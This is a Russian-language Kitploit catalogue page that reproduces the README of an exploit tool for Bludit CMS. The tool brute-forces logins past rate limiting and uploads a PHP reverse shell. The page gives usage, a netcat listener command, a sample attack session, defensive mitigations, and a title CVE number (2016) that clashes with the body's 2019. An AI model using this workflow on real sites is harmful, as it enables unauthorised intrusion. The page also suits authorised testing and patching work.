Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2016-16113-POC — cve-2016-16113 | Kitploit
Инструменты/GitHubGitHub/d3vn0mi/cve-2016-16113-poc
Атаки на ПаролиГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubd3vn0mi/cve-2016-16113-poc

CVE-2016-16113-POC

cve-2016-16113

Репозиторий
128 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Get RCE — эксплойт Bludit CMS

root@kitploit:~
     _ _____             ___            _ 
  __| |___ /_   ___ __  / _ \ _ __ ___ (_)
 / _` | |_ \ \ / / '_ \| | | | '_ ` _ \| |
| (_| |___) \ V /| | | | |_| | | | | | | |
 \__,_|____/ \_/ |_| |_|\___/|_| |_| |_|_|

Автоматизированный инструмент эксплуатации, который объединяет CVE-2019-17240 (обход аутентификации) и CVE-2019-16113 (произвольная загрузка файлов) для достижения удалённого выполнения кода на уязвимых установках Bludit CMS.

⚠️ Правовое предупреждение

ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ НА БЕЗОПАСНОСТЬ

Этот инструмент предназначен для специалистов по безопасности, проводящих авторизованные тесты на проникновение, и исследователей безопасности, действующих в правовых рамках. Несанкционированный доступ к компьютерным системам является незаконным в соответствии с такими законами, как Закон о мошенничестве и злоупотреблениях с использованием компьютеров (CFAA) в США, и аналогичным законодательством по всему миру.

Используя этот инструмент, вы соглашаетесь:

  • Проводить тестирование только тех систем, которые принадлежат вам или на которые у вас есть явное письменное разрешение
  • Соблюдать все применимые местные, государственные и федеральные законы
  • Нести полную ответственность за свои действия

Автор не несёт ответственности и не отвечает за любое неправомерное использование или ущерб, причинённый этим инструментом.

📋 Обзор

Этот эксплойт автоматизирует процесс:

  1. Проверки доступности цели
  2. Обхода аутентификации методом перебора (с использованием CVE-2019-17240)
  3. Загрузки вредоносной PHP-оболочки с обратным соединением (эксплуатация CVE-2019-16113)
  4. Установления обратного соединения оболочки

Детали уязвимостей

  • CVE-2019-17240: Обход аутентификации из-за некорректной реализации ограничения частоты запросов (обходится с помощью манипуляции заголовком X-Forwarded-For)
  • CVE-2019-16113: Уязвимость произвольной загрузки файлов, позволяющая выполнять вредоносный PHP-код

Затронутые версии: Bludit CMS версии 3.9.2 и ниже

🚀 Возможности

  • ✅ Автоматическая проверка доступности цели
  • ✅ Обход аутентификации методом перебора
  • ✅ Возможность перечисления имён пользователей
  • ✅ Комбинированный перебор имени пользователя и пароля
  • ✅ Автоматическая обработка CSRF-токенов
  • ✅ Генерация полезной нагрузки PHP-оболочки с обратным соединением
  • ✅ Загрузка .htaccess для расширенной эксплуатации
  • ✅ Проверка соединения

📦 Требования

  • Python 3.6+
  • Необходимые пакеты Python:
    • requests

🔧 Установка

root@kitploit:~
# Clone the repository
git clone https://github.com/yourusername/get-rce.git
cd get-rce

# Install dependencies
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.25.0

💻 Использование

Базовое использование

root@kitploit:~
python3 get_rce.py

Скрипт запросит у вас:

  1. URL цели (например, https://target.com)
  2. IP-адрес вашего слушателя
  3. Порт вашего слушателя
  4. Нужно ли перебирать имя пользователя
  5. Расположение словарей

Настройка слушателя

Перед запуском эксплойта настройте слушатель netcat:

root@kitploit:~
nc -lvnp 4444

Замените 4444 на выбранный вами порт.

Пример сеанса

root@kitploit:~
$ python3 get_rce.py

Enter target URL (i.e. https://target.com): http://10.10.10.191
[ ~ ] Enter listener's IP: 10.10.14.5
[ ~ ] Enter listener's port: 4444
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...

[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username): 
[...] We are gonna default to 'admin' as username.

[ ~ ] Enter the location for password list: /usr/share/wordlists/rockyou.txt
[ * ] Tried: 123456
[ * ] Tried: password
[ * ] Tried: 12345678
...
[ + ] Creds found: admin:Password123
[ + ] Login succeed... We are good to go :)

[ + ] The payload XyZaBcDeFg.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php
[ + ] You should be getting a shell by now, if not open http://10.10.10.191/bl-content/tmp/XyZaBcDeFg.php

Режимы атаки

Режим 1: Известное имя пользователя + перебор пароля

root@kitploit:~
Should I bruteforce username? [Y/N]: N
What username should I use?: admin
Enter the location for password list: /path/to/passwords.txt

Режим 2: Полный перебор учётных данных

root@kitploit:~
Should I bruteforce username? [Y/N]: Y
Enter the location for username wordlist: /path/to/usernames.txt
Enter the location for password wordlist: /path/to/passwords.txt

📝 Рекомендуемые словари

  • SecLists: https://github.com/danielmiessler/SecLists

    • Имена пользователей: SecLists/Usernames/Names/names.txt
    • Пароли: SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
  • RockYou: /usr/share/wordlists/rockyou.txt (Kali Linux)

🔍 Как это работает

  1. Проверка цели: Проверяет, доступна ли цель
  2. Обход аутентификации:
    • Манипулирует заголовком X-Forwarded-For для обхода ограничения частоты запросов
    • Перебирает учётные данные с помощью предоставленных словарей
    • Автоматически обрабатывает CSRF-токены
  3. Эксплуатация:
    • Загружает PHP-оболочку с обратным соединением в /bl-content/tmp/
    • Загружает файл .htaccess для обеспечения выполнения кода
    • Запускает полезную нагрузку для установления обратного соединения
  4. Доступ к оболочке: Подключается обратно к вашему слушателю

🛡️ Меры защиты

Если вы системный администратор:

  • Немедленно обновитесь до Bludit 3.9.3 или новее
  • Внедрите надлежащее ограничение частоты запросов на основе сессии, а не IP-адреса
  • Проверяйте все загружаемые файлы (тип, расширение, содержимое)
  • Используйте межсетевые экраны для веб-приложений (WAF)
  • Отслеживайте появление подозрительных файлов в каталоге /bl-content/tmp/
  • Внедряйте политики надёжных паролей
  • Включите механизмы блокировки учётных записей

🐛 Устранение неполадок

Проблема: «Цель, похоже, недоступна»

  • Проверьте, что URL указан верно и содержит протокол (http/https)
  • Проверьте сетевое подключение
  • Убедитесь, что на цели действительно работает Bludit

Проблема: «Не удалось выполнить вход»

  • Убедитесь, что учётные данные верны
  • Попробуйте более полный словарь
  • Проверьте, нет ли на цели дополнительных механизмов аутентификации

Проблема: «Оболочка не получена»

  • Убедитесь, что ваш слушатель запущен
  • Проверьте правила межсетевого экрана с обеих сторон
  • Убедитесь, что IP-адрес и порт слушателя указаны верно и доступны

🔗 Ссылки

  • Подробности CVE-2019-17240
  • Подробности CVE-2019-16113
  • Официальный сайт Bludit

👤 Автор

d3vn0mi

📄 Лицензия

Этот проект предоставляется только в образовательных целях и для авторизованного тестирования безопасности. См. отказ от ответственности в начале этого README.

🤝 Участие в разработке

Приветствуются вклады, сообщения об ошибках и запросы новых функций! Загляните на страницу issues.

⭐ Благодарности

  • Сообществу исследователей безопасности за обнаружение и документирование этих уязвимостей
  • Команде Bludit за оперативное реагирование и исправление этих проблем
Скачать инструмент